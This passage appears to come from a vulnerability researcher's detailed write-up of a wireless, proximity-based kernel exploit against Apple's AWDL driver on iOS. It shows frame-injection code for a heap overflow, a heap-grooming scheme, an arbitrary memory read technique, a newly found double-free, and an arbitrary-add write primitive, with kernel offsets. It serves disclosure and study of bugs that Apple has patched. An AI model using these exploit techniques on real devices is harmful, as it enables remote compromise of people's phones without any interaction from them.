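    memset(&tlv, 0, sizeof(tlv));                /* unlisted fields stay as placeholders */
    tlv.type = tlv_type;
    tlv.length = (uint16_t)(sizeof(tlv) - 3);    /* assumed: excludes type + length header */
    tlv.steeringMsgID = 6;                       /* 6 on the first attempt, per the text */
    tlv.peer_count = 1;
    tlv.peer_macs[0] = *peer;
    return tlv;
}
```

With the packed layout above the whole TLV is 114 bytes, 48 of which are the eight peer MAC slots.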

UMI?

UMIs are Unicast Master Indication frames; unlike regular AWDL Master Indication frames, UMIs are sent to unicast MAC addresses.

We can now send a final frame:

char overflower[0x80]={0};

*(uint64_t*)(&overflower[0x50])=0x4141414141414141;

inject(RT(),

       WIFI(dst, reader_peer),

       AWDL(),

       SYNC_PARAMS(),

       SERV_PARAM(),

       HT_CAPS(),

       DATAPATH(reader_peer),

       SYNC_TREE((struct ether_addr*)overflower,

                  sizeof(overflower)/sizeof(struct ether_addr)),

       PKT_END());

There are two important parts to this frame:

1) We've included a SyncTree TLV which will trigger the buffer overflow. SYNC_TREE will copy the MAC addresses in overflower into the sync_tree_macs inline buffer in the IO80211AWDLPeer:

/* +0x1648 */  struct ether_addr sync_tree_macs[10];

/* +0x1684 */  uint8_t sync_error_count;

/* +0x1685 */  uint8_t had_chanseq_tlv;

/* +0x1686 */  uint8_t pad3[2];

/* +0x1688 */  uint64_t per_second_timestamp;

/* +0x1690 */  uint32_t n_frames_in_last_second;

/* +0x1694 */  uint8_t pad21[4];

/* +0x1698 */  void *steering_msg_blob;

/* +0x16A0 */  uint32_t steering_msg_blob_size;

sync_tree_macs is at offset +0x1648 in the IO80211AWDLPeer object and the steering_msg_blob is at +0x1698, so by placing our arbitrary read target 0x50 bytes into the SYNC_TREE TLV we'll overwrite the steering_msg_blob, in this case with the value 0x4141414141414141.

2) The other important part is that we no longer send the CHAN_SEQ_EMPTY TLV, meaning this peer will use the channel sequence in the sync_params TLV. This contains a channel sequence where the peer declares it is listening in every Availability Window (AW), meaning that the next time the UMI timer fires while the target device is also in an AW it will read the corrupted steering_msg_blob pointer and try to build a UMI using it. If we sniff for UMI frames coming from the target MAC address (dst in this example) and parse out TLV 0x1d we'll find our (almost) arbitrarily read memory!
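The 0x50 figure used for the overflow can be double-checked mechanically. The sketch below mirrors the field list above as a packed struct rebased so that sync_tree_macs sits at offset 0; `struct mac_addr`, `struct peer_tail` and `build_overflow` are names made up for this illustration, and the pointer field is modelled as a `uint64_t` so the layout does not depend on the build machine.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

struct mac_addr { uint8_t octet[6]; };   /* stand-in for struct ether_addr */

#define SYNC_TREE_MACS_OFFSET 0x1648u    /* offset of sync_tree_macs in the peer */

/* Tail of IO80211AWDLPeer as listed in the text, starting at sync_tree_macs. */
struct peer_tail {
    struct mac_addr sync_tree_macs[10];
    uint8_t  sync_error_count;
    uint8_t  had_chanseq_tlv;
    uint8_t  pad3[2];
    uint64_t per_second_timestamp;
    uint32_t n_frames_in_last_second;
    uint8_t  pad21[4];
    uint64_t steering_msg_blob;          /* a pointer in the real object */
    uint32_t steering_msg_blob_size;
} __attribute__((packed));

/* Zero-fills buf and places read_target where steering_msg_blob will land.
 * Returns the number of whole MAC entries to put in the SyncTree TLV,
 * or 0 if buf is too small to reach the pointer. */
static size_t build_overflow(uint8_t *buf, size_t buf_len, uint64_t read_target)
{
    size_t off = offsetof(struct peer_tail, steering_msg_blob);
    if (buf_len < off + sizeof(read_target))
        return 0;
    memset(buf, 0, buf_len);             /* same as `char overflower[0x80]={0}` */
    memcpy(buf + off, &read_target, sizeof(read_target));
    return buf_len / sizeof(struct mac_addr);
}
```

For the 0x80-byte buffer in the frame above this gives 21 MAC entries (126 bytes), which comfortably covers the 8-byte pointer at offset 0x50.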

In this case of course trying to read from an address like 0x4141414141414141 will almost certainly cause a kernel panic, so we've still got more work to do.

There are some important limitations for this read technique. Firstly, the steering_msg_blob has its length as the second dword member and that length will be used as the length of memory to copy into the UMI. This means that we can only read from places where the second dword pointed to is a small value, less than around 800 (the available space in the UMI frame). That size also dictates how much will be read. We can work with this as an initial arbitrary read primitive however.

The second limitation is the speed of these reads; in order to steer multiple peers at the same time and therefore perform multiple reads in parallel we'll need some more tricks. For now, the only option is to wait for steering to fail and restart the steering process. This takes around 8 seconds, after which the steering process can be restarted by using a steeringMsgID value of 0 rather than 6 in the BSS_STEERING TLV.

At this point we can get memory sent back to us provided it meets some requirements. Helpfully, if the memory doesn't meet these requirements, as long as the virtual address was mapped and readable the code won't crash, so we have some leeway.
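The length constraint on the read primitive can be written down as a small predicate. This is a sketch under stated assumptions: the exact limit is only described as "around 800", so the cap here is set to 0x320 because that is the length value the heap groom later in this post relies on; treating a zero length as "nothing disclosed" is also an assumption, and the function name is invented.

```c
#include <stdint.h>
#include <string.h>

#define UMI_MAX_BLOB_LEN 0x320u   /* assumed cap; the text only says "around 800" */

/* Given the bytes at a candidate address, returns how many bytes the target
 * would copy into the UMI if steering_msg_blob pointed there, or 0 if the
 * second dword does not look like an acceptable length. */
static uint32_t umi_disclosed_len(const uint8_t *mem)
{
    uint32_t len;
    memcpy(&len, mem + 4, sizeof(len));   /* second dword, host byte order */
    if (len == 0 || len > UMI_MAX_BLOB_LEN)
        return 0;
    return len;
}
```

Any memory we want to read therefore has to be preceded, four bytes in, by a dword that passes this kind of check, which is why the groom pages described later carry their own small length field.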

My first idea here was to use the physmap, an (almost) 1:1 virtual mapping of the physical address space in virtual memory. The base of the physmap is randomized on iOS but the slide is smaller than the physical address space size, meaning there's a virtual address in there that you can always read from. This gives you a safe virtual address to dereference to start trying to find pointers to follow.

It was around this point in the development of the exploit that Apple released iOS 13.3.1, which patched the heap overflow. I wanted to also release at least some kind of demo at this point so I released a very basic proof-of-concept which drove the BSS Steering state machine far enough to read from the physmap, along with a little JavaScript snippet you could run in Safari to spray physical memory to demonstrate that you really were reading user data. Of course, this isn't all that compelling; the more compelling demo is still a few months down the road.

Discussing these problems with fellow Project Zero researchers Brandon Azad and Jann Horn, Brandon mentioned that on iOS the base of the zone map, used for most general kernel heap allocations, wasn't very randomized at all. I had looked at this using DTrace on macOS and it seemed fairly randomized, but dumping kernel layout information on iOS isn't quite as trivial as setting a boot argument to disable SIP and enable kernel DTrace.

Brandon had recently completed the exploit for his oob_timestamp bug and as part of that he'd made a spreadsheet showing various values such as the base of the zone and kalloc maps across multiple reboots. And indeed, the randomization of the base of the zone map is very minimal, around 16 MB:

kASLR     sane_size  zone_min          zone_max
04da4000  72fac000   ffffffe000370000  ffffffe02b554000
080a4000  73cac000   ffffffe0007bc000  ffffffe02be80000
08b28000  73228000   ffffffe00011c000  ffffffe02b3ec000
0bbb0000  721a4000   ffffffe0005bc000  ffffffe02b25c000
0c514000  7383c000   ffffffe000650000  ffffffe02bb68000
0d4d4000  72880000   ffffffe0002d8000  ffffffe02b208000
107d4000  7357c000   ffffffe00057c000  ffffffe02b98c000
12c08000  73148000   ffffffe000598000  ffffffe02b814000
13fb8000  71d98000   ffffffe000714000  ffffffe02b230000
184fc000  73854000   ffffffe00061c000  ffffffe02bb3c000

Using the Service Response Descriptor TLV technique we can allocate 16MB of memory in just a handful of frames, meaning we should stand a reasonable chance of being able to safely find our allocations on the heap.

What would we like to read? We've discussed before that in order to safely corrupt the fields after the vtable in the IO80211AWDLPeer object we'll need to know a PAC'ed vtable pointer, so we'd like to read one of those. If we're able to find one of those we'll also know the address of at least one IO80211AWDLPeer object.

If you make enough allocations of a particular size in iOS they will tend to go from lower addresses to higher addresses. Apple has introduced various small randomizations into exactly how objects are allocated but they're not relevant if we just look at the overall trend, which is to try to fill the virtual memory area reserved for the zone map from bottom to top.

Because the maximum slide value of the zone map is smaller than its size there will be a virtual address which is always inside the zone map

The insufficient randomization of the zone map base gives us quite a large virtual memory region I've dubbed the safe probe region where, provided we go roughly from low to high, we can safely read.
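One way to make the safe probe region concrete is to intersect the zone map ranges from the ten reboots in the spreadsheet above: any address that is above every observed zone_min and below every observed zone_max was inside the zone map on all of those boots. The sketch below does just that. Ten samples do not prove a bound on the slide, so the result is an estimate, and the struct and function names are invented for the illustration.

```c
#include <stddef.h>
#include <stdint.h>

struct zone_sample { uint64_t zone_min, zone_max; };

/* zone_min / zone_max columns from the spreadsheet above, one row per reboot. */
static const struct zone_sample zone_samples[] = {
    { 0xffffffe000370000ULL, 0xffffffe02b554000ULL },
    { 0xffffffe0007bc000ULL, 0xffffffe02be80000ULL },
    { 0xffffffe00011c000ULL, 0xffffffe02b3ec000ULL },
    { 0xffffffe0005bc000ULL, 0xffffffe02b25c000ULL },
    { 0xffffffe000650000ULL, 0xffffffe02bb68000ULL },
    { 0xffffffe0002d8000ULL, 0xffffffe02b208000ULL },
    { 0xffffffe00057c000ULL, 0xffffffe02b98c000ULL },
    { 0xffffffe000598000ULL, 0xffffffe02b814000ULL },
    { 0xffffffe000714000ULL, 0xffffffe02b230000ULL },
    { 0xffffffe00061c000ULL, 0xffffffe02bb3c000ULL },
};

struct addr_range { uint64_t lo, hi; };   /* half-open: [lo, hi) */

/* Intersection of all sampled zone maps: highest zone_min, lowest zone_max. */
static struct addr_range safe_probe_region(const struct zone_sample *s, size_t n)
{
    struct addr_range r = { 0, UINT64_MAX };
    for (size_t i = 0; i < n; i++) {
        if (s[i].zone_min > r.lo) r.lo = s[i].zone_min;
        if (s[i].zone_max < r.hi) r.hi = s[i].zone_max;
    }
    return r;
}
```

For these samples the intersection runs from 0xffffffe0007bc000 to 0xffffffe02b208000, which is most of the zone map. Being inside the zone map does not by itself mean a page is mapped, which is why the groom that follows tries to fill the region from the bottom up before probing it.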

Our heap groom is as follows:

We send a large number of service_response TLVs, each of which has the following form:

struct service_response_16k_id_tlv sr={0};

sr.type=2;

sr.len=sizeof(struct service_response_16k_id_tlv) - 3;

sr.s_1=2;

sr.key_buf[0]='A';

sr.key_buf[1]='B';

sr.v_1=0x4000;

sr.v_2=0x1648; // offset

sr.val_buf[0]=6;  // msg_type

sr.val_buf[1]=0x320; // msg_id

sr.val_buf[2]=0x41414141; // marker

sr.val_buf[3]=val; // value

Each of these TLVs causes the target device to make a 16KB kalloc allocation (one physical page) and then at offset +0x1648 in there write the following 4 dwords:

6

0x320

0x41414141

counter

The counter value increments by one for each TLV we send.

We put 39 of these TLVs in each frame, which will result in the allocation of 39 physical pages, or over 600KB, for each AWDL frame we send, allowing us to rapidly allocate memory.
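The spray arithmetic is easy to check. The short sketch below uses only the two figures from the text (16KB per TLV, 39 TLVs per frame); the function names are invented for the example.

```c
#include <stdint.h>

#define GROOM_ALLOC_SIZE 0x4000u   /* one 16KB kalloc allocation per TLV */
#define TLVS_PER_FRAME   39u       /* service_response TLVs per AWDL frame */

/* Bytes of kernel heap allocated on the target per spray frame. */
static uint32_t spray_bytes_per_frame(void)
{
    return GROOM_ALLOC_SIZE * TLVS_PER_FRAME;
}

/* Number of spray frames needed to allocate at least `bytes` (rounded up). */
static uint32_t spray_frames_to_cover(uint64_t bytes)
{
    uint64_t per_frame = spray_bytes_per_frame();
    return (uint32_t)((bytes + per_frame - 1) / per_frame);
}
```

Each frame accounts for 638,976 bytes (624KB), so covering the roughly 16MB of zone map randomization takes 27 frames.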

We split the groom into three sections, first sending a number of these spray frames, then a number of spoofed peers to cause the allocation of a large number of IO80211AWDLPeer objects. Finally we send another large number of the service response TLVs.

This results in a memory layout approximating this:

Inside the safe probe region we aim to place a number of IO80211AWDLPeer objects, surrounded by service_response groom pages with approximately incrementing counter values

If we now use the BSS Steering arbitrary read primitive to read from near the bottom of the safe probe region at offset +0x1648 from page boundaries, we should hopefully soon find one of the service_response TLV buffers. Since each service_response groom contains a unique counter which we can then read, we can make a guess for the distance between this discovered service_response buffer and the middle of the region where we think the target peers will be, and so compute a new guess for the location of a target peer. This technique lets us do something like a binary search to find an IO80211AWDLPeer object fairly efficiently.
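The guessing step can be sketched as follows. This is a deliberately idealised model, not the search logic of the real exploit: it assumes groom pages are laid out contiguously in counter order, that the first spray section used counters 0 to first_spray_pages - 1, and that the peers occupy one contiguous block of peer_region_bytes between the two spray sections. All names and parameters are hypothetical.

```c
#include <stdint.h>

#define GROOM_PAGE_SIZE 0x4000u   /* each service_response groom allocation */

/* Given the page-aligned address at which a groom buffer with counter
 * `found_counter` was read, estimate the address of the middle of the
 * block of sprayed peers. */
static uint64_t guess_peer_region_middle(uint64_t found_page_addr,
                                         uint32_t found_counter,
                                         uint32_t first_spray_pages,
                                         uint64_t peer_region_bytes)
{
    if (found_counter < first_spray_pages) {
        /* We landed in the first spray section: the peers are above us. */
        uint64_t pages_to_end = first_spray_pages - found_counter;
        return found_page_addr + pages_to_end * GROOM_PAGE_SIZE
                               + peer_region_bytes / 2;
    }
    /* We landed in the second spray section: the peers are below us. */
    uint64_t pages_from_start = found_counter - first_spray_pages;
    return found_page_addr - pages_from_start * GROOM_PAGE_SIZE
                           - peer_region_bytes / 2;
}
```

On a real heap the layout is only approximately ordered, so each new guess would be probed in turn and refined again from whatever counter comes back, which is what gives the search its binary-search flavour.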

Why did I choose to read from offset +0x1648? Because that's also the offset of the sync_tree_macs buffer in the IO80211AWDLPeer where we can place arbitrary data. Each of those middle target peers is created like this:

struct peer_fake_steering_blob {

  uint32_t msg_id;

  uint32_t msg_len;

  uint32_t magic; // 0x43434343 == peer

  struct ether_addr mac; // the MAC of this peer

  uint8_t pad[32];

} __attribute__((packed));

struct peer_fake_steering_blob fake_steerer={0};

fake_steerer.msg_id=6;

fake_steerer.msg_len=0x320;

fake_steerer.magic=0x43434343;

fake_steerer.mac=target_groom_peer;

inject(RT(),

  WIFI(dst, target_groom_peer),

  AWDL(),

  SYNC_PARAMS(),

  SERV_PARAM(),

  HT_CAPS(),

  DATAPATH(target_groom_peer),

  SYNC_TREE((struct ether_addr*)&fake_steerer,

            sizeof(struct peer_fake_steering_blob)

              /sizeof(struct ether_addr)),

  PKT_END());

The magic value 0x43434343 lets us determine whether our read has found a service_response buffer or a peer. Following that we put the spoofed MAC address of this peer. This allows us to determine which peer has the address we guessed. If we do manage to find a peer allocation we can then examine the remaining bytes of disclosed memory; there's a high probability that following this peer is another peer, and we've disclosed the first few dozen bytes of it. Here's a hexdump of a successfully located peer:

An annotated hexdump of the disclosed memory when two neighbouring IO80211AWDLPeer objects are found. Here you can see the runtime values of the fields in the peer header, including the PAC'ed vtable pointer

We can see here that we've managed to find two peers next to each other. We'll call these lower_peer and upper_peer. By placing each sprayed peer's MAC address in the sync_tree_macs array we're able to determine both lower_peer's and upper_peer's MAC addresses. Since we know which guessed virtual address we chose we also know the virtual addresses of lower_peer and upper_peer, and from the PAC'ed vtable pointer we can compute the KASLR slide.
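Telling the two kinds of disclosed buffer apart comes down to checking the third dword. The sketch below assumes the disclosed bytes start at the beginning of the fake blob (two header dwords, then the magic, then either a counter or a MAC address), which matches the groom and peer_fake_steering_blob layouts shown above; the type and function names are invented.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define GROOM_MAGIC 0x41414141u   /* marker written by the service_response groom */
#define PEER_MAGIC  0x43434343u   /* marker placed in each sprayed peer */

enum probe_kind { PROBE_UNKNOWN, PROBE_GROOM_PAGE, PROBE_PEER };

struct probe_result {
    enum probe_kind kind;
    uint32_t counter;   /* valid when kind == PROBE_GROOM_PAGE */
    uint8_t  mac[6];    /* valid when kind == PROBE_PEER */
};

/* Classifies the payload of a sniffed 0x1d TLV (host byte order assumed). */
static struct probe_result classify_probe(const uint8_t *data, size_t len)
{
    struct probe_result r;
    uint32_t magic;

    memset(&r, 0, sizeof(r));
    r.kind = PROBE_UNKNOWN;
    if (len < 12)
        return r;
    memcpy(&magic, data + 8, sizeof(magic));      /* third dword */
    if (magic == GROOM_MAGIC && len >= 16) {
        r.kind = PROBE_GROOM_PAGE;
        memcpy(&r.counter, data + 12, sizeof(r.counter));
    } else if (magic == PEER_MAGIC && len >= 18) {
        r.kind = PROBE_PEER;
        memcpy(r.mac, data + 12, sizeof(r.mac));
    }
    return r;
}
```

A groom hit feeds its counter back into the next address guess, while a peer hit yields the spoofed MAC that identifies which sprayed peer lives at the probed address.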

From now on we can easily and repeatedly corrupt the fields seen above by sending a large sync tree TLV containing a modified version of this dumped memory:

Using the disclosed memory we can safely manipulate the lower fields in upper_peer using the SyncTree buffer overflow

Accidental 0day 1 of 2

During my experiments to get the BSS Steering state machine working and into the required state where it would send UMIs, I noticed that the target device would sometimes kernel panic, even when I was fairly sure that I hadn't triggered the heap overflow vulnerability. As it turns out, I was accidentally triggering another zero-day vulnerability...

oops!

This was a little concerning as it had now been months since I had reported the first AWDL-based vulnerability to Apple and a fix for that had already shipped. One of my early hopes for Project Zero was that we could have a "research amplification" effect: we would invest significant effort in publicly less-understood areas of vulnerability research and exploitation and present our results to the affected vendors, who would then use their much greater resources to continue this research. Vendors have resources such as source code and design documents which should make it vastly easier to audit many of these attack surfaces; we'd be keen to help with this second phase as well.

A more pragmatic view of reality is that while the security and product teams do want to continue our research, and do have many more resources, the one important resource they lack is time. Justifying the benefits of fixing a vulnerability which will become public in 90 days is easy, but extracting the maximum value from that external report by investing a significant amount of time is much harder to justify; these teams have already got other goals and targets for the quarter. Time is the key resource which makes Project Zero successful; we don't have to do vulnerability triage, or design review, or fix bugs, or any of the other things typical product security teams have to do.

I mention this because I stumbled over (and reported to Apple) not one but two more remotely-exploitable radio-proximity 0-day vulnerabilities during this research, the first of which appears to have been at least on some level known about:

Mark Dowd is the co-founder of Azimuth, an Australian "market-leading information security business".

It's well known to all vulnerability researchers that the easiest way to find a new vulnerability is to look very closely at the code near a vulnerability which was recently fixed. They are rarely isolated incidents and usually indicate a lack of testing or understanding across an entire area.

I'm emphasising this point because Mark Dowd's tweet above is claiming knowledge of a variant that wasn't so hard to find. One which was so easy to find, in fact, that it falls out by accident if you make the slightest mistake when doing BSS Steering.

We saw the function IO80211AWDLPeer::populateBssSteeringMsgBlob earlier; it's responsible for allocating and populating the steering_msg_blob buffer which will end up as the contents of the 0x1d TLV sent in an AWDL BSS Steering UMI.

At the beginning of the function they check whether this peer already has a steering_msg_blob:

if (this->steering_msg_blob && this->steering_msg_blob_size) {

  …

  kfree(this->steering_msg_blob, this->steering_msg_blob_size);

  this->steering_msg_blob=0LL;

}

If it does have one it gets free'd and NULL-ed out.

They then compute the size of the new steering_msg_blob, allocate it and fill it in:

steering_blob_size=*(_DWORD *)(msg + 0x3C) + 0x4F;

this->steering_msg_blob=kalloc(steering_blob_size);

this->steering_blob_size=steering_blob_size;

All okay.

Right at the end of the function they then try to add the peer to the "UMI chain"; this is that other linked list of peers with pending UMIs which we saw earlier:

err=0;

if (this->addPeerToUmiChain()) {

  if ( peer_manager

      && peer_manager->isSafeToSendUmiNow(

  this->chanseq_channels[peer_manager->current_chanseq_step + 1],0)) {

    err=0;

    // in a shared AW; force UMI timer to expire now

    peer_manager->UMITimer->setTimeoutMS(0);

  }

} else {

  kfree(this->steering_msg_blob, this->steering_msg_blob_size);

  this->UMI_feature_mask=0;

  err=0xE00002BC;

}

return err;

If the peer gets successfully added to the UMI chain, they check whether they can send the UMI right now (if both this device and the target are in AWs on the same channel). If so, they force the UMI timer to expire, which triggers the code we saw earlier to read the steering_msg_blob, build the UMI template and send it.

However, if addPeerToUmiChain fails then the steering_msg_blob is freed. But unlike the earlier kfree, this time they don't NULL out the pointer before returning. The vulnerability here is that this field is expected to be the owner of that allocation; so if we can somehow come back into populateBssSteeringMsgBlob again this same value will be freed a second time.

There's an even easier way to trigger a double-kfree however: by doing nothing.

After a period of inactivity the IO80211AWDLPeer object will be destructed and free'd. As part of that, IO80211AWDLPeer::freeResources will be called, which does this:

steering_msg_blob=this->steering_msg_blob;

if ( steering_msg_blob ) {

  kfree(steering_msg_blob, this->steering_msg_blob_size);

  this->steering_msg_blob=0LL;

  this->steering_msg_blob_size=0;

}

It will see a value for steering_msg_blob which has already been freed and free it a second time. If an attacker were able to reallocate the buffer in between the two frees they could get that controlled object freed, leading to a use-after-free.
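The ownership bug can be reproduced in a small user-space model. Nothing here is the kernel code: the "heap" is a single tracked allocation so that the second free is counted rather than actually performed, and the null_after_free flag shows the effect of the missing pointer reset. All names are invented for the illustration.

```c
#include <stddef.h>
#include <stdint.h>

/* A one-slot model heap that counts frees of an already-freed allocation. */
struct model_heap { int live; int double_frees; };

static void *model_kalloc(struct model_heap *h)
{
    h->live = 1;
    return h;                 /* any non-NULL token will do for the model */
}

static void model_kfree(struct model_heap *h, void *p)
{
    if (p == NULL)
        return;
    if (!h->live)
        h->double_frees++;    /* this allocation was already freed */
    h->live = 0;
}

struct model_peer { void *steering_msg_blob; uint32_t steering_msg_blob_size; };

/* Models the tail of populateBssSteeringMsgBlob. */
static void model_populate_blob(struct model_heap *h, struct model_peer *peer,
                                int add_to_umi_chain_ok, int null_after_free)
{
    peer->steering_msg_blob = model_kalloc(h);
    peer->steering_msg_blob_size = 0x4f;
    if (!add_to_umi_chain_ok) {
        model_kfree(h, peer->steering_msg_blob);
        if (null_after_free)
            peer->steering_msg_blob = NULL;   /* the step the real code omits */
    }
}

/* Models freeResources, called when the idle peer is torn down. */
static void model_free_resources(struct model_heap *h, struct model_peer *peer)
{
    if (peer->steering_msg_blob) {
        model_kfree(h, peer->steering_msg_blob);
        peer->steering_msg_blob = NULL;
        peer->steering_msg_blob_size = 0;
    }
}

/* Returns how many double frees occur when the peer times out after one
 * populate call. */
static int double_frees_after_timeout(int add_to_umi_chain_ok, int null_after_free)
{
    struct model_heap h = { 0, 0 };
    struct model_peer peer = { NULL, 0 };
    model_populate_blob(&h, &peer, add_to_umi_chain_ok, null_after_free);
    model_free_resources(&h, &peer);
    return h.double_frees;
}
```

In the model, a failed chain insertion without the pointer reset produces exactly one double free at teardown, and either a successful insertion or resetting the pointer produces none.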

It actually took some reversing effort to work out how to make addPeerToUmiChain not fail. The trick is that the peer needs to have sent a datapath TLV with the 0x800 flag set in the first dword, and that's why we set that flag.

This vulnerability also opens a different possibility for the initial memory disclosure. By steering multiple peers it's possible to use this to build a primitive where the target device will try to send a UMI containing memory from a steering_msg_blob which has been freed. With some heap grooming this could allow the disclosure of both a stale allocation as well as out-of-bounds data without needing to guess pointers. In the end I chose to stick with the low zone_map entropy technique as I also wanted to try to land this remote kernel exploit using only a single vulnerability.

We'll get back to the exploit now and check out accidental 0day 2 of 2 later on...

We've seen that the peer objects seem to be accessed frequently in the background, not just when we're sending frames. This is important to bear in mind as we look for our next corruption target.

One option might be to use the arbitrary free primitive. Maybe we could free a peer object, but this would be tricky as the memory allocator would write metadata over the vtable pointer and the peer might be used in the background before we got a chance to ensure it was safe.

Another possibility might be to cause a type confusion. It's possible that you could find a useful gadget with such a primitive but I figured I'd keep looking for something else.

At this point I started going through more AWDL code looking for all the indirect writes I could find. Being able to write even an uncontrolled value to an arbitrary address is usually a good stepping-stone to a full arbitrary memory write primitive.

There's one indirect write which stood out as particularly interesting, right at the start of IO80211AWDLPeer::actionFrameReport:

  peer_manager=this->peer_manager;

  frame_len=mbuf_len(frame_mbuf);

  peer_manager->total_bytes_received +=frame_len;

  ++this->n_frames_in_last_second;

  per_second_timestamp=this->per_second_timestamp;

  absolute_time_now=mach_absolute_time();

  frames_in_last_second=this->n_frames_in_last_second;

  if ( ((absolute_time_now - per_second_timestamp) / 1000000)

        > 1024 )// more than 1024ms difference

  {

    if ( frames_in_last_second>=0x21 )

      IO80211Peer::logDebug(

        (IO80211Peer *)this,

        "%s[%d] : Received %d Action Frames from peer %02X:%02X:%02X:%02X:%02X:%02X in 1 second. Bad Peer\n",

        “actionFrameReport”,

        1533LL,

        frames_in_last_second,

        this->peer_mac.octet[0],

        this->peer_mac.octet[1],

        this->peer_mac.octet[2],

        this->peer_mac.octet[3],

        this->peer_mac.octet[4],

        this->peer_mac.octet[5]);

    this->per_second_timestamp=mach_absolute_time();

    this->n_frames_in_last_second=1;

  }

  else if ( frames_in_last_second>=0x21 )

  {

    *(_DWORD *)(a2 + 20)=1;

    return 0;

  }

  … // continue on to parse the frame

These first three lines of the decompiler output are exactly the kind of indirect write we're looking for:

  peer_manager=this->peer_manager;

  frame_len=mbuf_len(frame_mbuf);

  peer_manager->total_bytes_received +=frame_len;

The peer_manager field is at offset +0x28 in the peer object, easily corruptible with the linear overflow. The total_bytes_received field is a u32 at offset +0x7c80 in the peer manager, and frame_len is the length of the WiFi frame we send, so we can set this to an arbitrary value, albeit at least 0x69 (the minimum AWDL frame size) and less than 1200 (potentially larger with fragmentation, but it wouldn't help much). That arbitrary value would then get added to the u32 at offset +0x7c80 from the peer_manager pointer. This would be enough to do a byte-by-byte write of arbitrary memory, presuming you knew what was there before:

By corrupting upper_peer's peer_manager pointer then spoofing a frame from upper_peer we can cause an indirect write through the corrupted peer_manager pointer. The peer_manager has a dword field at offset +0x7c80 which counts the total number of bytes received from all peers; actionFrameReport will add the length of the frame spoofed from upper_peer to the dword at the corrupted peer_manager pointer + 0x7c80, giving us an arbitrary add primitive
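To see why a bounded add is enough for a byte-by-byte write, here is a small simulation. It is a sketch under assumptions: memory is modelled as a little-endian byte array, the previous contents are known (as the text requires), bytes are written from the lowest address upwards so that carries only spill into bytes that are fixed later, and the up to three bytes after the written range may be disturbed by those carries. The function names are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

#define MIN_FRAME_LEN 0x69u                   /* minimum AWDL frame size */
#define MAX_FRAME_LEN 1200u                   /* upper bound given in the text */
#define TOTAL_BYTES_RECEIVED_OFFSET 0x7c80u   /* field offset in the peer manager */

/* Value to place in the corrupted peer_manager field so that the add lands
 * on `target`. */
static uint64_t fake_peer_manager_for(uint64_t target)
{
    return target - TOTAL_BYTES_RECEIVED_OFFSET;
}

/* Frame length whose low byte turns `current` into `wanted`; 0 means no
 * frame is needed. The result is always below MAX_FRAME_LEN. */
static uint32_t frame_len_for_byte(uint8_t current, uint8_t wanted)
{
    uint32_t len = (uint8_t)(wanted - current);   /* difference modulo 256 */
    if (len == 0)
        return 0;
    while (len < MIN_FRAME_LEN)
        len += 0x100;                             /* keeps the low byte unchanged */
    return len;
}

/* Models `total_bytes_received += frame_len` on a little-endian u32. */
static void model_add_u32(uint8_t *p, uint32_t v)
{
    uint32_t cur = (uint32_t)p[0] | (uint32_t)p[1] << 8 |
                   (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
    cur += v;
    p[0] = (uint8_t)cur;
    p[1] = (uint8_t)(cur >> 8);
    p[2] = (uint8_t)(cur >> 16);
    p[3] = (uint8_t)(cur >> 24);
}

/* Writes n bytes at mem[off..]; mem must extend at least 3 bytes past the
 * range. Returns the number of frames (adds) that were needed. */
static size_t write_bytes_with_add(uint8_t *mem, size_t off,
                                   const uint8_t *wanted, size_t n)
{
    size_t frames = 0;
    for (size_t i = 0; i < n; i++) {
        uint32_t len = frame_len_for_byte(mem[off + i], wanted[i]);
        if (len == 0)
            continue;
        model_add_u32(mem + off + i, len);
        frames++;
    }
    return frames;
}
```

Each target byte costs at most one frame of between 0x69 and 0x168 bytes, well inside the stated length limits.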

We do have a limited read primitive already, probably enough to bootstrap ourselves to a full arbitrary read and therefore a full arbitrary write. We can indeed reach this code with a corrupted peer_manager pointer and get an arbitrary add primitive. There's just one tiny problem, which will take many more weeks to solve: we'll panic immediately after the write.

Although the IO80211AWDLPeer's peer_manager field doesn't seem to be used frequently in the background (unlike the vtable), the peer_manager field will be used later on in the actionFrameReport method, and since we're trying to write to arbitrary addresses this will almost certainly cause a panic.

Looking at the code, there's only one safe path out of actionFrameReport:

  if ( ((absolute_time_now - per_second_timestamp) / 1000000)

        > 1024 )// more than 1024ms difference

  {

    if (frames_in_last_second>=0x21)

      IO80211Peer::logDebug(

        (IO80211Peer *)this,

        "%s[%d] : Received %d Action Frames from peer %02X:%02X:%02X:%02X:%02X:%02X in 1 second. Bad Peer\n",

        “actionFrameReport”,

        1533LL,

        frames_in_last_second,

        this->peer_mac.octet[0],

        this->peer_mac.octet[1],

        this->peer_mac.octet[2],

        this->peer_mac.octet[3],

        this->peer_mac.octet[4],

        this->peer_mac.octet[5]);

    this->per_second_timestamp=mach_absolute_time();

    this->n_frames_in_last_second=1;

  }

  else if ( frames_in_last_second>=0x21 )

  {

    *(_DWORD *)(a2 + 20)=1;

    return 0;

  }

We need to reach that return 0 statement, which means we need the first if clause to be false, and the second one to be true.

The first statement checks whether more than 1024 ms have elapsed since the per_second_timestamp was updated.

The second statement checks whether more than 32 frames have been received since the per_second_timestamp was last updated.

So to reach the return 0 and avoid the panics due to an invalid peer_manager pointer we’d need to ensure that 32 frames have been received from the same spoofed peer within a 1024ms period.
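The two checks can be modelled in a few lines of C. This is a minimal sketch rather than the driver’s code: the struct, the name takes_early_return and the assumption that timestamps are already in nanoseconds are all mine; only the 1024 ms window and the 0x21 threshold come from the decompiled snippet above.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical model of the two fields the check depends on. */
struct peer_rate_state {
    uint64_t per_second_timestamp_ns; /* assumed to already be in nanoseconds */
    uint32_t n_frames_in_last_second;
};

/* Returns true when the modelled actionFrameReport would take the safe
 * "return 0" path for a frame arriving at now_ns. */
static bool takes_early_return(struct peer_rate_state *p, uint64_t now_ns)
{
    p->n_frames_in_last_second++;   /* the frame is counted before the checks */

    uint64_t elapsed_ms = (now_ns - p->per_second_timestamp_ns) / 1000000;
    if (elapsed_ms > 1024) {
        /* Window expired: counters reset and execution carries on into code
         * that uses peer_manager again. */
        p->per_second_timestamp_ns = now_ns;
        p->n_frames_in_last_second = 1;
        return false;
    }
    return p->n_frames_in_last_second >= 0x21; /* 33rd frame in the window */
}
```

With 32 frames already counted inside the window, the next frame returns early; with only 31, it does not.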

